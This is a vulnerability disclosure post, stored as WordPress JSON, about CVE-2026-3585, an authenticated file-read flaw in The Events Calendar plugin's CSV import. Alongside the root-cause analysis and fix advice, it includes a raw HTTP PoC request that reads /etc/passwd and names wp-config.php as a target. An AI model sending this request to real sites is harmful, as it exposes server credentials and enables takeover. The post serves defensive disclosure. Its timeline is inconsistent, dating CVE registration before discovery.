{"id":3513,"date":"2026-03-10T05:42:12","date_gmt":"2026-03-10T05:42:12","guid":{"rendered":"https:\/\/research.cleantalk.org\/?p=3513"},"modified":"2026-03-10T05:42:13","modified_gmt":"2026-03-10T05:42:13","slug":"cve-2026-3585","status":"publish","type":"post","link":"https:\/\/research.cleantalk.org\/cve-2026-3585\/","title":{"rendered":"CVE-2026-3585\u00a0&#8211; The Events Calendar &#8211; LFI Author+ &#8211; POC"},"content":{"rendered":"\n<p><strong>CVE-2026-3585<\/strong> affects The Events Calendar and its Event Aggregator import workflow. It is an authenticated Local File Inclusion issue in the CSV import path where a low privilege user who can manage event imports can point the importer at an arbitrary local path and force the server to open it as if it were a CSV file. Even though this does not look like code execution, the security impact is serious because it turns an editorial role into a tool for\u00a0<strong>reading sensitive server files<\/strong>\u00a0that were never meant to be exposed through the application. 
Given the plugin\u2019s large install base around 700k plus, this becomes especially relevant on multi author sites and organizations where event staff have elevated content permissions but should not have access to server level secrets.<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>CVE<\/td><td><strong>CVE-2026-3585<\/strong><\/td><\/tr><tr><td>Plugin Version<\/td><td><a href=\"https:\/\/wordpress.org\/plugins\/the-events-calendar\/\">The Events Calendar &lt;= 6.15.17<\/a><\/td><\/tr><tr><td>All Time<\/td><td><strong>80 233 333<\/strong><\/td><\/tr><tr><td>Active installations<\/td><td><strong>700 000+<\/strong><\/td><\/tr><tr><td>Publicly Published<\/td><td>March 9, 2026<\/td><\/tr><tr><td>Last Updated<\/td><td>March 9, 2026<\/td><\/tr><tr><td>Researcher<\/td><td>Dmitrii Ignatyev<\/td><\/tr><tr><td>PoC<\/td><td>Yes<\/td><\/tr><tr><td>Exploit<\/td><td>No<\/td><\/tr><tr><td>Reference <\/td><td><a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2026-3585\">https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2026-3585<\/a><br><a href=\"https:\/\/www.wordfence.com\/threat-intel\/vulnerabilities\/wordpress-plugins\/the-events-calendar\/the-events-calendar-61517-authenticated-author-arbitrary-file-read-via-ajax-create-import\">https:\/\/www.wordfence.com\/threat-intel\/vulnerabilities\/wordpress-plugins\/the-events-calendar\/the-events-calendar-61517-authenticated-author-arbitrary-file-read-via-ajax-create-import<\/a><br><a href=\"https:\/\/t.me\/cleantalk_researches\/382\">https:\/\/t.me\/cleantalk_researches\/382<\/a><\/td><\/tr><tr><td>Plugin Security Certification by CleanTalk<\/td><td> <img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" class=\"wp-image-15\" style=\"width: 150px;\" src=\"https:\/\/research.cleantalk.org\/wp-content\/uploads\/2023\/10\/New_1_not_safe-1.png\" alt=\"\"><br><a 
href=\"https:\/\/blog.cleantalk.org\/wp-content\/uploads\/2023\/09\/New_1_not_safe-1-1.webp\"><\/a><\/td><\/tr><tr><td>Logo of the plugin<\/td><td><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" class=\"wp-image-3514\" style=\"width: 150px;\" src=\"https:\/\/research.cleantalk.org\/wp-content\/uploads\/2026\/03\/icon-256x256-5.gif\" alt=\"\"><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Timeline<\/strong><\/h2>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>March 3, 2026<\/td><td>Plugin testing and vulnerability detection in <strong>The Events Calendar<\/strong> were completed<\/td><\/tr><tr><td>March 3, 2026<\/td><td>I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing<\/td><\/tr><tr><td>January 8, 2026<\/td><td>Registered 
<strong>CVE-2026-3585<\/strong><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Discovery of the Vulnerability<\/strong><\/h2>\n\n\n\n<p>The vulnerable behavior sits in the Event Aggregator AJAX import flow. A user-controlled value in\u00a0<code>aggregator[csv][file]<\/code>\u00a0is accepted by the import creation handler and persisted into the import record metadata as a file path without enforcing a safe directory allow list. The server then resolves the path with\u00a0<code>realpath<\/code>\u00a0and proceeds to open it via the CSV reader using\u00a0<code>SplFileObject<\/code>. The critical mistake is that\u00a0<code>realpath<\/code>\u00a0only canonicalizes the path; it does not enforce that the file belongs to an approved directory such as uploads or a dedicated import folder. As a result, a path like\u00a0<code>\/etc\/passwd<\/code>\u00a0or another readable local file can be treated as a source file for import processing, which is the essence of a\u00a0<strong>path-based authorization failure<\/strong>\u00a0in file handling code.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Understanding LFI Attacks<\/strong><\/h2>\n\n\n\n<p>Local File Inclusion issues in WordPress plugins are often high severity because WordPress deployments keep sensitive data in predictable locations. A classic target is\u00a0<code>wp-config.php<\/code>\u00a0which can expose database credentials and authentication salts, and on many hosts additional secrets are present in environment files, debug logs, or deployment artifacts. Even system files like\u00a0<code>\/etc\/passwd<\/code>\u00a0can be valuable because they reveal usernames and service accounts that help attackers tailor later exploitation. In shared hosting and container deployments, the directory structure often contains neighboring app configs, backups, or mounted secrets. 
When a plugin lets an authenticated user open arbitrary readable paths, it can become a stepping stone from a simple author account to\u00a0<strong>full compromise through credential theft<\/strong>. This is why LFI is not just information disclosure. It frequently becomes a pivot into database access and account takeover.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Exploiting the LFI Vulnerability<\/strong><\/h2>\n\n\n\n<p>To exploit <strong>CVE-2026-3585<\/strong>, an attacker with Author+ cookies:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><strong>POC<\/strong>:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">Go to http:\/\/138.124.55.33\/wp-admin\/edit.php?post_type=tribe_events&amp;page=aggregator and grep \"tribe_aggregator_nonce\" nonce\n\nPOST \/wp-admin\/admin-ajax.php HTTP\/1.1\nHost: 138.124.55.33\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:140.0) Gecko\/20100101 Firefox\/140.0\nAccept: *\/*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: http:\/\/138.124.55.33\/wp-admin\/edit.php?post_type=tribe_events&amp;page=aggregator\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 194\nOrigin: http:\/\/138.124.55.33\nDNT: 1\nSec-GPC: 1\nConnection: keep-alive\nCookie: AUTHOR+\n\naction=tribe_aggregator_create_import&amp;tribe_aggregator_nonce=431f15e9b5&amp;aggregator[origin]=csv&amp;aggregator[csv][content_type]=tribe_events&amp;aggregator[csv][file]=\/etc\/passwd&amp;aggregator[action]=new\n<\/code><\/pre>\n<\/blockquote>\n\n\n\n<p>The most damaging outcome is disclosure of configuration and secret material that enables follow on compromise. If an attacker can read WordPress config or environment secrets, they can pivot to database extraction, credential reuse, and long term persistence. 
On sites with staging and production on the same host, directory enumeration and file reads can expose deployment pipelines, API keys, and backups. For organizations that run events at scale, a compromised author account is realistic through phishing or credential reuse, and this bug would convert that foothold into server level intelligence. The risk is amplified because the import feature is often enabled for operational convenience, and admins may grant event editors broader permissions than they realize. This makes the vulnerability a practical target for\u00a0<strong>quiet credential theft<\/strong>\u00a0rather than noisy defacement.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong><strong>Recommendations for Improved Security<\/strong><\/strong><\/h2>\n\n\n\n<p>The correct fix is strict path policy. The importer must enforce that the CSV file path resides only within an approved directory, typically uploads or a dedicated aggregator import directory, using\u00a0<code>realpath<\/code>\u00a0on both the candidate path and the base directory and then performing a prefix check. Any absolute path outside the allowed base must be rejected before the import record is created. It is also important to disallow direct filesystem paths entirely and require uploads through WordPress media handling, storing only attachment IDs rather than paths. On the authorization side, access to the aggregator import endpoints should be restricted to trusted roles only, and nonces should be validated as request integrity controls but not treated as authorization. 
As an operational mitigation, site owners should review which roles can access Event Aggregator, disable CSV import if it is not needed, and rotate secrets if there is any suspicion of exposure, especially database credentials and API keys.<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>By taking proactive measures to address <strong>LFI vulnerabilities like CVE-2026-3585<\/strong>, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.<\/p>\n<cite>Dmitrii I.<\/cite><\/blockquote>\n","protected":false},"excerpt":{"rendered":"<p>CVE-2026-3585 affects The Events Calendar and its Event Aggregator import workflow. It is an authenticated Local File Inclusion issue in the CSV import path where a low privilege user who can manage event imports can point the importer at an arbitrary local path and force the server to open it as if it were a CSV file. Even though this does not look like code execution, the security impact is serious because it turns an editorial role into a tool for reading sensitive server files that were never meant to be exposed through the application. 
Given the plugin\u2019s large install base around 700k plus, this becomes especially relevant on multi author sites and organizations where event staff have elevated content permissions but should not have access to server level secrets.<\/p>\n","protected":false},"author":2,"featured_media":15,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,1],"tags":[],"class_list":["post-3513","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cve","category-security","","tg-column-two"]}